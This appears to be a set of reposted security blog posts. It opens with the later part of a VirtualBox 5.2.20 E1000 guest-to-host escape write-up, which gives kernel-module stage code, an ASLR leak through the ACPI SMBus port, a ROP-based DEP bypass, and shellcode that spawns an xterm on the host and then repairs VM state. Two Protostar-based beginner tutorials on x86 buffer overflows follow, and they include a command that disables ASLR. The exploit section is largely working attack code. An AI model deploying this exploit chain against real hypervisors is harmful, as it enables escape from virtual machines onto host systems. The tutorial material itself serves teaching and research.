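                              DELTA_OHCI_TO_ACPI)        /* = 0x8A70 */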

On virtual machine boot up the ACPI device is created (src/VBox/Devices/PC/DevACPI.cpp):

typedef struct ACPIState
{
...
    uint8_t             au8SMBusBlkDat[32];
    uint8_t             u8SMBusBlkIdx;
    uint32_t            uPmTimeOld;
    uint32_t            uPmTimeA;
    uint32_t            uPmTimeB;
    uint32_t            Alignment5;
} ACPIState;

An ACPI port input/output handler is registered for the 0x4100-0x410F range. For port 0x4107 we have:

PDMBOTHCBDECL(int) acpiR3SMBusRead(PPDMDEVINS pDevIns, void *pvUser, RTIOPORT Port, uint32_t *pu32, unsigned cb)
{
    RT_NOREF1(pDevIns);
    ACPIState *pThis = (ACPIState *)pvUser;
...
    switch (off)
    {
...
        case SMBBLKDAT_OFF:
            *pu32 = pThis->au8SMBusBlkDat[pThis->u8SMBusBlkIdx];
            pThis->u8SMBusBlkIdx++;
            pThis->u8SMBusBlkIdx &= sizeof(pThis->au8SMBusBlkDat) - 1;
            break;
...

When the guest OS executes an INB(0x4107) instruction to read one byte from the port, the handler takes one byte from the au8SMBusBlkDat[32] array at index u8SMBusBlkIdx and returns it to the guest. And this is how the write primitive applies: since the distances between the virtual devices’ heap blocks are constant, so is the distance from the EEPROM93C46.m_au16Data array to ACPIState.u8SMBusBlkIdx. By writing two bytes to ACPIState.u8SMBusBlkIdx we can read arbitrary data within a 255-byte range from ACPIState.au8SMBusBlkDat.
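
On the guest side the read itself is trivial. A minimal sketch in the LKM context, assuming the write primitive has already placed the desired index into u8SMBusBlkIdx (presumably this is roughly what the stage_1_leak_byte() used below boils down to):

#include <linux/types.h>
#include <asm/io.h>                     /* inb(): port I/O from kernel code */

#define ACPI_SMB_BLKDAT_PORT 0x4107     /* the SMBBLKDAT handler shown above */

static u8 leak_one_byte(void)
{
    /* Returns au8SMBusBlkDat[u8SMBusBlkIdx]; the handler then increments and
       masks the index, so every out-of-bounds read has to be re-armed by the
       write primitive first. */
    return inb(ACPI_SMB_BLKDAT_PORT);
}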

There is an obstacle. Looking at the ACPIState structure, it can be seen that the array is placed at the end of the structure, and the remaining fields are useless for a leak. So let’s look at what can be found after the structure:

gef➤  x/16gx (ACPIState*)(0x7fc47008be70+0x100)+1
0x7fc47008d4e0:	0xffffe98100000090	0xfffd9b2000000000
0x7fc47008d4f0:	0x00007fc470067a00	0x00007fc470067a00
0x7fc47008d500:	0x00000000a0028a00	0x00000000000e0000
0x7fc47008d510:	0x00000000000e0fff	0x0000000000001000
0x7fc47008d520:	0x000000ff00000002	0x0000100000000000
0x7fc47008d530:	0x00007fc47008c358	0x00007fc44d6ecdc6
0x7fc47008d540:	0x0031000035944000	0x00000000000002b8
0x7fc47008d550:	0x00280001d3878000	0x0000000000000000
gef➤  x/s 0x00007fc44d6ecdc6
0x7fc44d6ecdc6:	"ACPI RSDP"
gef➤  vmmap VBoxDD.so
Start                           End                             Offset                          Perm Path
0x00007fc44d4f3000 0x00007fc44d768000 0x0000000000000000 r-x /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d768000 0x00007fc44d968000 0x0000000000275000 --- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d968000 0x00007fc44d977000 0x0000000000275000 r-- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
0x00007fc44d977000 0x00007fc44d980000 0x0000000000284000 rw- /home/user/src/VirtualBox-5.2.20/out/linux.amd64/release/bin/VBoxDD.so
gef➤  p 0x00007fc44d6ecdc6 - 0x00007fc44d4f3000
$2 = 0x1f9dc6

It turns out there is a pointer to a string located at a fixed offset from the VBoxDD.so image base. The pointer lies at offset 0x58 past the end of ACPIState. We can read that pointer byte by byte using the primitives and finally obtain the VBoxDD.so image base. We just have to hope that the data past the ACPIState structure is not random on each virtual machine boot. Fortunately, it isn’t: the pointer at offset 0x58 is always there.

Information Leak

Now we combine the write and read primitives to bypass ASLR. We will overflow the heap, overwriting the EEPROM93C46 structure, then trigger the EEPROM state machine to write the index into the ACPIState structure, and then execute INB(0x4107) in the guest to make ACPI return one byte of the pointer. This is repeated 8 times, incrementing the index by 1 each time.

uint64_t stage_1_main(void* mmio, void* tx_ring) {
    printk(KERN_INFO PFX"##### Stage 1 #####\n");

    // When loopback mode is enabled data (network packets actually) of every Tx Data Descriptor 
    // is sent back to the guest and handled right now via e1kHandleRxPacket.
    // When loopback mode is disabled data is sent to a network as usual.
    // We disable loopback mode here, at Stage 1, to overflow the heap but not touch the stack buffer
    // in e1kHandleRxPacket. Later, at Stage 2 we enable loopback mode to overflow heap and 
    // the stack buffer.
    e1000_disable_loopback_mode(mmio);

    uint8_t leaked_bytes[8];
    uint32_t i;
    for (i = 0; i < 8; i++) {
        stage_1_overflow_heap_buffer(mmio, tx_ring, i);
        leaked_bytes[i] = stage_1_leak_byte();

        printk(KERN_INFO PFX"Byte %d leaked: 0x%02X\n", i, leaked_bytes[i]);
    }

    uint64_t leaked_vboxdd_ptr = *(uint64_t*)leaked_bytes;
    uint64_t vboxdd_base = leaked_vboxdd_ptr - LEAKED_VBOXDD_RVA;
    printk(KERN_INFO PFX"Leaked VBoxDD.so pointer: 0x%016llx\n", leaked_vboxdd_ptr);
    printk(KERN_INFO PFX"Leaked VBoxDD.so base: 0x%016llx\n", vboxdd_base);

    return vboxdd_base;
}

It has been said that in order for the integer underflow not to lead to the stack buffer overflow, certain E1000 registers have to be configured. The point is that the buffer is overflowed in the e1kHandleRxPacket function, which is called while handling Tx descriptors in loopback mode. Indeed, in loopback mode the guest sends network packets to itself, so they are received right after being sent. We disable this mode so that e1kHandleRxPacket is unreachable.

DEP Bypass

We have bypassed ASLR. Now the loopback mode can be enabled and the stack buffer overflow can be triggered.

void stage_2_overflow_heap_and_stack_buffers(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    off_t buffer_pa;
    void* buffer_va;
    alloc_buffer(&buffer_pa, &buffer_va);

    stage_2_set_up_buffer(buffer_va, vboxdd_base);
    stage_2_trigger_overflow(mmio, tx_ring, buffer_pa);

    free_buffer(buffer_va);
}

void stage_2_main(void* mmio, void* tx_ring, uint64_t vboxdd_base) {
    printk(KERN_INFO PFX"##### Stage 2 #####\n");

    e1000_enable_loopback_mode(mmio);
    stage_2_overflow_heap_and_stack_buffers(mmio, tx_ring, vboxdd_base);
    e1000_disable_loopback_mode(mmio);
}

From now on, when the last instruction of e1kHandleRxPacket is executed, the saved return address has been overwritten and control is transferred wherever the attacker wants. But DEP is still there. It is bypassed in the classical way, by building a ROP chain. The ROP gadgets allocate executable memory, copy a shellcode loader into it, and execute it.

Shellcode

The shellcode loader is trivial. It copies the shellcode from the overflowing buffer on the stack to the memory right after itself.

use64

start:
    lea rsi, [rsp - 0x4170];
    push rax
    pop rdi
    add rdi, loader_size
    mov rcx, 0x800
    rep movsb
    nop

payload:
    ; Here the shellcode is to be

loader_size = $ - start

The shellcode is executed. Its first part is:

use64

start:
    ; sys_fork
    mov rax, 57
    syscall

    test rax, rax
    jnz continue_process_execution

    ; Initialize argv
    lea rsi, [cmd]
    mov [argv], rsi

    ; Initialize envp
    lea rsi, [env]
    mov [envp], rsi

    ; sys_execve
    lea rdi, [cmd]
    lea rsi, [argv]
    lea rdx, [envp]
    mov rax, 59
    syscall

...

cmd     db '/usr/bin/xterm', 0
env     db 'DISPLAY=:0.0', 0
argv    dq 0, 0
envp    dq 0, 0

It performs fork and execve to spawn a /usr/bin/xterm process. The attacker gains control over the host’s ring 3.

Process Continuation

I believe every exploit should finish cleanly, meaning it should not crash the application, though of course that is not always possible. We need the virtual machine to continue execution, which is achieved by the second part of the shellcode.

continue_process_execution:
    ; Restore RBP
    mov rbp, rsp
    add rbp, 0x48

    ; Skip junk
    add rsp, 0x10

    ; Restore the registers that must be preserved according to System V ABI
    pop rbx
    pop r12
    pop r13
    pop r14
    pop r15

    ; Skip junk
    add rsp, 0x8

    ; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
    ; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
    ; After:    "E1000-Xmit" -> NULL

    ; Zero out the entire PDMQUEUE "Mouse_1" pointed by "E1000-Rcv"
    ; This was unnecessary on my testing machines but to be sure...
    mov rdi, [rbx]
    mov rax, 0x0
    mov rcx, 0xA0
    rep stosb

    ; NULL out a pointer to PDMQUEUE "E1000-Rcv" stored in "E1000-Xmit"
    ; because the first 8 bytes of "E1000-Rcv" (a pointer to "Mouse_1") 
    ; will be corrupted in MMHyperFree
    mov qword [rbx], 0x0

    ; Now the last PDMQUEUE is "E1000-Xmit" which will not be corrupted

    ret

When e1kHandleRxPacket is called, the call stack is:

#0 e1kHandleRxPacket
#1 e1kTransmitFrame
#2 e1kXmitDesc
#3 e1kXmitPacket
#4 e1kXmitPending
#5 e1kR3NetworkDown_XmitPending
...

We’ll return right into e1kR3NetworkDown_XmitPending, which does nothing more and returns to a hypervisor function.

static DECLCALLBACK(void) e1kR3NetworkDown_XmitPending(PPDMINETWORKDOWN pInterface)
{
    PE1KSTATE pThis = RT_FROM_MEMBER(pInterface, E1KSTATE, INetworkDown);
    /* Resume suspended transmission */
    STATUS &= ~STATUS_TXOFF;
    e1kXmitPending(pThis, true /*fOnWorkerThread*/);
}

The shellcode sets RBP to RSP plus 0x48 to make it what it should be in e1kR3NetworkDown_XmitPending. Next, the registers RBX, R12, R13, R14, and R15 are popped from the stack, because the System V ABI requires a callee to preserve them. If they aren’t restored, the hypervisor will crash because of the invalid pointers left in them.

That could be enough: the virtual machine no longer crashes and continues executing. But there would be an access violation in the PDMR3QueueDestroyDevice function when the VM is shut down. The reason is that when the heap is overflowed, an important structure, PDMQUEUE, is overwritten. Moreover, it is overwritten by the last two ROP gadgets, i.e. the last 16 bytes. I tried to reduce the ROP chain size and failed, and when I restored the data manually the hypervisor still crashed, which meant the obstacle was not as obvious as it seemed.

The data structure being overwritten is a linked list. The corrupted data lies in the second-to-last list element: it is its next pointer that gets overwritten. The remedy turned out to be simple:

; Fix the linked list of PDMQUEUE to prevent segfaults on VM shutdown
; Before:   "E1000-Xmit" -> "E1000-Rcv" -> "Mouse_1" -> NULL
; After:    "E1000-Xmit" -> NULL

Getting rid of the last two elements allows the virtual machine to shut down smoothly.

Demo

https://vimeo.com/299325088

Реклама

Linux Buffer Overflows x86 Part 2 ( Overwriting and manipulating the RETURN address)

( Original text by SubZero0x9 )

Hello Friends, this is the 2nd part of the Linux x86 Buffer Overflows. First of all I want to apologize for such a long delay after the First blog of this series, there were personal and professional issues going on in my life (Well who hasn’t got them? Meh?).

In the previous part we learned about the Process Memory, Stack Region, Stack Operations, Stack Registers, Attempting Buffer Overflow, Overwriting Buffer, ESP and EIP. In case you missed it, here is the link to the Part 1:

https://movaxbx.ru/2018/11/06/getting-started-with-linux-buffer-overflows-x86-part-1-introduction/

Quick Recap to the Part 1:

-> We successfully exploited the insufficient bound checking by giving input which was larger than the buffer size, which led to the overflow.

-> We successfully attempted to overwrite the buffer and the EIP (Instruction Pointer).

-> We used GDB debugger to examine the buffer for our input and where it was placed on the stack.

Till now, we already know how to attempt a buffer overflow on a vulnerable binary. We already have the control of EIP and ESP.

So, Whats Next ?

Till now we have only overwritten the buffer. We haven’t really exploit anything yet. You may have read articles or PoC where Buffer Overflow is used to escalate privileges or it is used to get a reverse shell over the network from a vulnerable HTTP Server. Buffer Overflow is mainly used to execute arbitrary commands on the vulnerable system.

So, we will try to execute arbitrary commands by using this exploit technique.

In this blog, we will mainly focus on how to overwrite the return address to manipulate the flow of control and program execution.

Lets see this in more detail….

We will use a simple program to manipulate its intended output by changing the RETURN address.

(The following example is same as the AlephOne’s famous article on Stack Smashing with some modifications for a better and easy understanding)

Program:

 

This is a very simple program where the variable random is assigned a value ‘0’, then a function named function is called, the flow is transferred to the function()and it returns to the main() after executing its instructions. Then the variable random is assigned a value ‘1’ and then the current value of random is printed on the screen.

Simple program, we already know its output i.e 1.

But, what if we want to skip the instruction random=1; ?

That means, when the function() call returns to the main(), it will not perform the assignment of value ‘1’ to random and directly print the value of random as ‘0’.

So how can we achieve this?

Lets fire up GDB and see how the stack looks like for this program.

(I won’t be explaining each and every instruction, I have already done this in the previous blog. I will only go through the instructions which are important to us. For better understanding of how the stack is setup, refer to the previous blog.)

In GDB, first we disassemble the main function and look where the flow of the program is returned to main() after the function() call is over and also the address where the assignment of value ‘1’ to random takes place.

-> At the address 0x08048430, we can see the value ‘0’ is assigned to random.

-> Then at the address 0x08048437 the function() is called and the flow is redirected to the actual place where the function() resides in memory at 0x804840b address.

-> After the execution of function() is complete, it returns the flow to the main()and the next instruction which gets executed is the assignment of value ‘1’ to random which is at address 0x0804843c.

->If we want to skip past the instruction random=1; then we have to redirect the flow of program from 0x08048437 to 0x08048443. i.e after the completion of function() the EIP should point to 0x08048443 instead of 0x0804843c.

To achieve this, we will make some slight modifications to the function(), so that the return address should point to the instruction which directly prints the randomvariable as ‘0’.

Lets take a look at the execution of the function() and see where the EIP points.

-> As of now there is only a char array of 5 bytes inside the function(). So, nothing important is going on in this function call.

-> We set a breakpoint at function() and step through each instruction to see what the EIP points after the function() is exectued completely.

-> Through the command info regsiters eip we can see the EIP is pointing to the address 0x0804843c which is nothing but the instruction random=1;

Lets make this happen!!!

From the previous blog, we came to know about the stack layout. We can see how the top of the stack is aligned, 8 bytes for the buffer, 4 bytes for the EBP, 4 bytes for the RET address and so on (If there is a value passed as parameter in a function then it gets pushed first onto the stack when the function is called).

-> When the function() is called, first the RET address gets pushed onto the stack so the program flow can be maintained after the execution of function().

->Then the EBP gets pushed onto the stack, so the EBP can act as the offset reference point for other instructions to access and calculate the memory addresses.

-> We have char array buffer of 5 bytes, but the memory is allocated in terms of WORD. Basically 1 word=4 bytes. Even if you declare a variable or array of 2 bytes it will be allocated as 4 bytes or 1 word. So, here 5 bytes=2 words i.e 8 bytes.

-> So, in our case when inside the function(), the stack will probably be setup as buffer + EBP + RET

-> Now we know that after 12 bytes, the flow of the program will return to main()and the instruction random = 1; will be executed. We want to skip past this instruction by manipulating the RET address to somehow point to the address after 0x0804843c.

->We will now try to manipulate the RET address by doing something like below :-

 

Here, we are introducing an int pointer ret, and we are assigning it the starting address of buffer + 12 .i.e (wait lets see this in a diagram)

-> So, the ret pointer now ends exactly at the start where the return value is actually stored. Now, we just want to add ret pointer with some value which will change the return value in such a manner that it will skip past the return = 1;instruction.

Lets just go back to the disassembled main function and calculate how much we have to add to the ret pointer to actually skip past the assignment instruction.

-> So, we already know we want to skip pass the instruction at address 0x0804843c to address 0x08048443. By subtracting these two address we get 7. So we will add 7 to the return address so that it will point to the instruction at address 0x08048443.

-> And now we will add 7 to the ret pointer.

 

So our final code should look like:

 

So, now we will compile our code.

 

Since we are adding code and re-compiling the program, the memory addresses will get changed.

Lets take a look at the new memory addresses.

-> Now the assignment instruction random = 1; is at address 0x08048452 and the next address which we want the return address to point is 0x08048459. The difference between these addresses is still 7. So we are good till now.

Hopefully by executing this we will get the output as “The value of random is: 0”

HOLY HELL!!!

Why did it gave the Segmentation fault (core dumped)? That means maybe the process is trying to access a memory that doesn’t exist or something.

Note:- Well this was really tricky for me atleast. Computers works in mysterious ways, it is not just mathematics, numbers and science ( Yeah I am being dramatic)

Lets fire up our binary in GDB and see whats wrong.

-> As you can see we set a breakpoint at line 4 and run the program. The breakpoint hits and the program halts. Then we examine the stack top and what we see, the distance between the start of the buffer and the start of return address is not 12, its 13. (It doesn’t even make sense mathematically). Three full block adds up for 12 bytes (4 bytes each) and 1 byte for that ‘A’ i.e 41.

-> Our buffer had value “ABCDE” in it. And A in ASCII hex is 41. From 41 to just right before of the return address 0x08048452, the count is 13 which traditionally is not correct. I still don’t know why the difference is 13 instead of 12, if anyone knows kindly tell me in the comments section.

-> So we just change our code from ret = buffer + 12; to ret = buffer + 13;

Now the final code will look like this:

 

Now, we re-compile it and run and hope its now going to give a desired output.

Before continuing lets see this again in GDB:

> So, we can see now after 7 is added to the ret pointer, the return address is now 0x08048459 which means we have successfully skipped past the assignment instruction and overwritten the return address to manipulate our way around the program flow to alter the program execution.

Till now we learnt a very important part of buffer overflow i.e how to manipulate and overwrite the return address to alter the program execution flow.

Now, lets another example where we can overwrite the return address in more similar ‘buffer overflow’ fashion.

We will use the program from protostar buffer overflow series. You can find more about it here: https://exploit-exercises.com/protostar/

 

Small overview of a program:-

->There is a function win() which has some message saying “code flow successfully changed”. So we assume this is the goal.
-> Then there is the main(), int pointer fp is declared and defined to ‘0’ along with char array buffer with size 64. The program asks for user input using the getsfunction and the input is stored in the array buffer.
-> Then there is an if statement where if fp is not equal to zero then it calls the function pointer jumping to some memory location.

Now we already know that gets function is vulnerable to buffer overflow (visit previous blog) and we have to execute the win() function. So by not wasting time lets find out the where the overflow happens.

First we will compile the code:

 

We know that the char array buffer is of 64 bytes. So lets feed input accordingly.

So, as we can see after the 64th byte the overflow occurs and the 65th ‘A’ i.e 41 in ASCII Hex is overwriting the EIP.

Lets confirm this in GDB:

-> As we see the buffer gets overflowed and the EIP is overwritten with ‘A’ i.e 41.

Now lets find the address of the win() function. We can find this with GDB or by objdump.

Objdump is a tool which is used to display information about object files. It comes with almost every Linux distribution.

The -d switch stands for disassemble. When we use this, every function used in a binary is listed, but we just wanted the address of win() function so we just used grep to find our required string in the output.

So it tells us that the win() function’s starting address is 0804846b. To achieve our goal we just have to pass this address after the 64th byte so that the EIP will get overwritten by this address and execute the win() function for us.

But since our machine is little endian (Find more about it here)we have to pass the address in a slightly different manner (basically in reverse). So the address 0804846b will become \x6b\x84\x04\x08 where the \x stands for HEX value.

Now lets just form our input:

As we can see the win() function is successfully executed. The EIP is also pointing the address of win().

Hence, we have successfully overwritten the return address and exploited the buffer overflow vulnerability.

Thats all for this blog. I am sorry but this blog also went quite long, but I will try to keep the next blog much shorter. And also, in the next blog we will try to play with shellcode.

 

 

Getting Started with Linux Buffer Overflows x86 – Part 1 (Introduction)

( Original text by SubZero0x9 )

Hello Friends, this series of blog posts will purely focus on Buffer Overflows. When I started my journey in Infosec, this one topic fascinated me as much as it frightened me. When I read some of the blogs related to Buffer Overflows, it really seemed as some High-level gibber jabber containing C code, Assembly and some black terminals (Yeah I am talking about GDB). Over the period of time and preparing for OSCP, I started to learn about Buffer Overflows in detail referring to the endless materials on Web scattered over different planets. So, I will try to explain Buffer Overflow in depth and detail so everyone reading this blog can understand what actually a Buffer Overflow is.

In this blog, we will understand the basic fundamentals behind the Buffer Overflow vulnerability. Buffer Overflow is a memory corruption attack which involves memory, stack, buffers to name a few. We will go through each of this and understand why really Buffer Overflows takes place in the first place. We will focus on 32-bit architecture.

A little heads up: This blog is going to be a lengthy one because to understand the concepts of Buffer Overflow, we have to understand the process memory, stack, stack operations, assembly language and how to use a debugger. I will try to explain as much as I can. So I strongly suggest to stick till the end and it will surely clear your concepts. Also, from the next blog I will try to keep it short :p :p

So lets get started….
Before getting to stack and buffers, it is really important to understand the Process Memory Organization. Process Memory is the main playground where it all happens. In theory, the Process memory where the program/process resides is quite a complex place. We will see the basic part which we need for Buffer Overflow. It consists of three main regions: Text, Data and Stack.

Text: The Text region contains the Program Code (basically instructions) of the executable or the process which will be executed. The Text area is marked as read-only and writing any data to this area will result into Segmentation Violation (Memory Protection Mechanism).

Data: The Data region consists of the variables which are declared inside the program. This area has both initialized (data defined while coding) and uninitialized (data declared while coding) data. Static variables are stored in this section.

Stack: While executing a program, there are many function and procedure calls along with many JUMP instructions which after the functions work is done has to return to its next intended place. To carry out this operation, to execute a program, the memory has an area called Stack. Whenever the CALL instruction is used to call a function, the stack is used. The Stack is basically a data structure which works on the LIFO (Last In First Out) principle. That means the last object entering the stack is the first object to get out. We will see how a stack works in detail below.

To understand more about the Process Memory read this fantastic article: https://www.bottomupcs.com/elements_of_a_process.xhtml

So Lets see an Assembly Code Skeleton to understand more about how the program is executed in Process Memory.


Here, as we can see the assembly program skeleton has three sections: .data, .bss and .txt

-> .txt section contains the assembly code instructions which resides in the Text section of the process memory.

-> .data section contains the initialized data or lets say defined variables or data types which resides in the Data section of the process memory.

-> .bss section contains the uninitialized data or lets say declared variables that will be used later in the program execution which also resides in the Data section of the process memory

However in a traditionally compiled program there may be many sections other than this.

Now the most important part….

HOLY STACK!!!

As we discussed earlier all the dirty work is done on the Stack. Stack is nothing but a region of memory where data is temporarily stored to carry out some operations. There are mainly two operations performed by stack: PUSH and POPPUSH is used to add the object on top of the stack, POP is used to remove the object from top of the stack.

But why stack is used in the first place?

Most of the programs have functions and procedures in them. So during the program execution flow, when the function is called, the flow of control is passed to the stack. That means when the function is called, all the operations which will take place inside the function will be carried out on the Stack. Now, when we talk about flow of control, after when the execution of the function is done, the stack has to return the flow of control to the next instruction after which the function was called in the program. This is a very important feature of the stack.

So, lets see how the Stack works. But before that, lets get familiar with some stack pointers and registers which actually carries out everything on the Stack.

ESP (Extended Stack Pointer): ESP is a stack register which points to the top of the stack.

EBP (Extended Base Pointer): EBP is a stack register which points to the base of the current frame when a function is called (just below the saved return address). EBP is really essential in stack operations because when a function is called its arguments and local variables are stored on the stack, and as the stack grows the offsets of those arguments and variables keep changing with respect to ESP. Because ESP changes so often it is difficult for the compiler to keep track of everything relative to it, hence EBP is used instead: when the function is called, the value of ESP is copied into EBP, making EBP the fixed reference point other instructions use to calculate memory addresses.

EIP (Extended Instruction Pointer): EIP is the register which tells the processor the address of the next instruction to execute.

RET (return) address: The return address is the address to which the flow of control has to be passed once the function is finished.

Stack Frame: A stack frame is a region on the stack which contains a function's parameters, local variables, the saved base pointer and the return address (the value of the instruction pointer at the time of the function call).
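
A tiny C example (added for illustration) helps to picture this: when func(1, 2) is called, the caller pushes the arguments and the return address, and func's prologue then saves EBP and reserves room for the local variable; all of that together forms func's stack frame.

int func(int a, int b)      /* a and b are pushed on the stack by the caller   */
{
    int local = a + b;      /* local variable lives inside func's stack frame  */
    return local;           /* ret pops the saved return address back into EIP */
}

int main(void)
{
    return func(1, 2);      /* call pushes the return address and jumps to func */
}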

Okay, so now let's look at the stack closely by executing a C program. For this blog post we will be using the challenge 'stack0' from the Protostar exploit series, which is a series of stack-based buffer overflow challenges.
You can find more about Protostar exploit series here -> https://exploit-exercises.com/protostar/

The program:

What's the program about?
An int variable modified and a 64-byte char array buffer are declared. Then modified is set to 0 and user input is read into buffer using the gets() function. The value of modified is then checked: if it is anything other than 0 the message “you have changed the ‘modified’ variable” is printed, otherwise “Try again?” is printed.
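
Putting that description into C, the stack0 listing looks roughly like this:

#include <stdio.h>
#include <stdlib.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if (modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}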

Let's execute the program once and see what happens.

So after executing the program, it asks for user input; after giving the string “IamGrooooot” it displays “Try again?”. From the output it is clear that the modified variable is still 0.

Now let's try to debug this executable in a debugger; we will be using GDB throughout this blogpost series (Why? Because it's freaking awesome).

Just type gdb ./executable_name to execute the program in the debugger.

The first thing we do after firing up gdb is disassembling the main() function of our program.

We can see the main() function now, in assembly language. So let's try to understand what this actually means.

The main() function starts at address 0x080483f4.
-> Since there are no arguments passed to the main function, EBP is pushed directly onto the stack.
As we know, EBP is the base pointer of the previous frame, so its current value is saved on the stack for later restoration.

-> Next, the value of ESP is moved into EBP, i.e. the current ESP is saved as the new base pointer. This is done because the operations on function arguments and local variables keep changing ESP, which makes it difficult for the compiler to track offsets relative to it; EBP gives a fixed reference point instead.

-> Many times the compiler adds some instructions for better alignment of the stack. The instruction at address 0x080483f7 masks ESP so its lower bits become zero (16-byte alignment). This instruction is not important to us.

-> The next instruction at address 0x080483fa subtracts the hex value 0x60 from ESP. Now ESP points to a much lower address than EBP (as we know, the stack grows downwards in memory). This gap between ESP and EBP is basically the stack frame, where the operations needed to execute the program are carried out.

-> Now, the instruction at address 0x080483fd is where our C code starts to make sense. Here we can see the instruction movl $0x0,0x5c(%esp), where the value 0 is moved to ESP plus the offset 0x5c, i.e. 0 is written to the address [ESP+0x5c]. This is the same as modified = 0 in our program.

-> From address 0x08048405 to 0x0804840c are the instructions which accept the user input.
The instruction lea 0x1c(%esp),%eax loads the effective address [ESP+0x1c] into the EAX register. This address points to the char array buffer on the stack. The lea and mov instructions are almost the same; the only difference is that lea copies the computed address (register plus offset) into the destination instead of the content at that address (which is what mov does).

-> The instruction mov %eax,(%esp) copies the address stored in the EAX register to the memory at the top of the stack, so the top of the stack now holds the address 0x1c(%esp). This matters because function arguments are passed on top of the stack: the next instruction calls the gets function, and gets reads its argument (the destination pointer) from there. In this case that argument is the address of our char buffer, so gets writes the user input into the char array at 0x1c(%esp).

-> From address 0x08048411 to 0x0804842e the if condition is carried out. The instruction mov 0x5c(%esp),%eax copies the value of the modified variable (i.e. 0) into EAX. Then the test instruction checks whether the value of modified has changed or not. If the value has not changed, i.e. the je condition is met, the flow of control jumps to 0x08048427 where the message “Try again?” will be printed. If the value has changed, execution falls through to the next instruction, thus printing the message “you have changed the ‘modified’ variable”.

-> Now all the operations are done, but the stack is still set up; for the program to complete, control has to be passed to the RET address stored on the stack. Until now variables and addresses have only been pushed on the stack and nothing has been popped. At address 0x08048433 the leave instruction is executed. The leave instruction is used to “free” the stack frame. If we look at the disassembled main(), the first two instructions, push %ebp and mov %esp,%ebp, basically set up the stack frame. The leave instruction does exactly the opposite of those two instructions, i.e. mov %ebp,%esp and pop %ebp. This tears down the stack frame, and the following ret passes the flow of control to the RET address, i.e. to the instruction after the call. In this case the RET address does not point to anything interesting for us because our program ends here.

So far we have seen what our C code means in assembly. It is really important to understand these things, because when we debug or reverse engineer some binary, this understanding of how the memory and the stack work really comes in handy.

Now we will see the stack operations in GDB. For those doing debugging and reversing for the first time it may feel overwhelming to see all these instructions (believe me, I used to go nuts sometimes), so for the moment we will focus only on the parts required for this series, like where our input is being written and how memory addresses can be overwritten.

Here comes the mighty GDB !!!!

In GDB we will list the program, so we can know where we want to set a breakpoint.

We will set breakpoints at line numbers 7, 11 and 13, then run it in GDB.
-> After we run it in GDB, we can see the breakpoints which we set are now hit; basically the program execution is interrupted and the program flow halts at the given breakpoint.

-> We step to the next instruction by typing s at the prompt, and we can see the next breakpoint get hit.

-> At this point we check both registers ESP and EIP, in two different ways. We check ESP using the x command, which examines memory. We can see that ESP points to the stack address 0xbffff0b0 and the value it contains is 0x00000000, i.e. 0. We can reasonably assume this 0 is the same 0 which gets assigned to the modified variable.

-> We check EIP with the command info registers eip (you can see info about all the registers by simply typing info registers). We see that EIP points to the memory address 0x8048405, which is nothing but the address of the next instruction to be executed.

Now we step again and see what happens.
-> When we step through the next instruction it asks us for input. We give a random string of ‘A’s, and then we can see that the third breakpoint we set earlier is hit.

-> We again check ESP and EIP. We clearly see that ESP has changed and points to a different stack address. EIP now points to the next instruction which is going to be executed.

Now let's see where the input we gave actually goes.
-> Using the examine memory command x we look at the contents around ESP. We are viewing 24 words of the stack in hex (that's why x/24xw $esp). We can see our input ‘A’, which is 41 in hex (per the ASCII standard), on the stack (highlighted portion). So our input is being written onto the stack.

Again, let's step through the next instruction.
-> In the previous step we saw that the statement if (modified != 0) is about to be executed. Going back to the section where we covered the assembly equivalent of the C program in detail, we can see the instruction test %eax,%eax will be executed. So we already know it checks whether the modified value has changed or not.

How do we see that ?

-> We simply check the EAX register by typing info registers eax. We can see that the value of EAX is 0x0, i.e. 0, which means the value of the modified variable is still 0. Now we know the message “Try again?” is going to be printed. EIP also confirms this: it points to 0x8048427, and if you look at the disassembled main function you can see that this is the call to the second puts, which prints the message “Try again?”.

Let's step on and move towards the exit of the program.
-> When we step through the next instruction, it gives us the message “Try again?”. Then we check EIP: it points to 0x8048433, which is nothing but the leave instruction. Stepping through again, we can see the program exiting, terminated by the exit call in the libc.so.6 shared library.

WOAH!!!!!

So far we have seen how process memory works, how programs get loaded into memory and how stack operations are performed when a program is executed. This is more than enough to understand what a buffer overflow really is.

BUFFER OVERFLOW

Finally we can get started with the topic. Lets ask ourselves two very simple questions:

What is a Buffer?
-> A buffer is a temporary storage area in memory used to hold data.

What is Buffer Overflow?
-> A buffer overflow happens when the data written to a buffer is larger than the buffer itself; due to improper bounds checking the excess data overflows and overwrites adjacent memory addresses/locations.
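
A minimal illustration (added here, not part of the challenge):

#include <string.h>

int main(void)
{
    char buffer[8];
    /* far more bytes than the 8-byte buffer can hold are copied in;
       the extra bytes spill over and overwrite whatever lies next to
       buffer on the stack */
    strcpy(buffer, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA");
    return 0;
}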

So, it's time to get our hands dirty by smashing the stack. Before that, note that for this blogpost series we will only focus on stack-based overflows. Also, the examples we are going to see may not be exploitable out of the box, because newer systems ship with protections enabled by default. If you are using a newer system, e.g. Ubuntu 16.04 LTS, you have to disable ASLR, as it is enabled to protect against memory corruption attacks.
To disable it simply type echo 0 > /proc/sys/kernel/randomize_va_space in your terminal.

Also, you have to compile the program using gcc with the stack smashing detection feature disabled. To do this, compile your program using:
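
A typical invocation looks like this (flags assumed: -fno-stack-protector disables the stack canary, -m32 produces a 32-bit binary matching the walkthrough):

gcc -m32 -fno-stack-protector -o stack0 stack0.c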

We will use the program from earlier, the one we used for understanding the stack. This program is vulnerable to buffer overflow. As we can see, the program uses the gets function to accept user input, and gets has some serious security issues. Let's look at the man page for gets. As the highlighted part says: “Never use gets(). Because it is impossible to tell without knowing the data in advance how many characters gets() will read, and because gets() will continue to store characters past the end of the buffer, it is extremely dangerous to use. It has been used to break computer security. Use fgets() instead”.

From this we can understand that no bounds checking happens when user input is taken through the gets function (extremely dangerous, right?).

Now let's look at what the program does and what the challenge is all about.
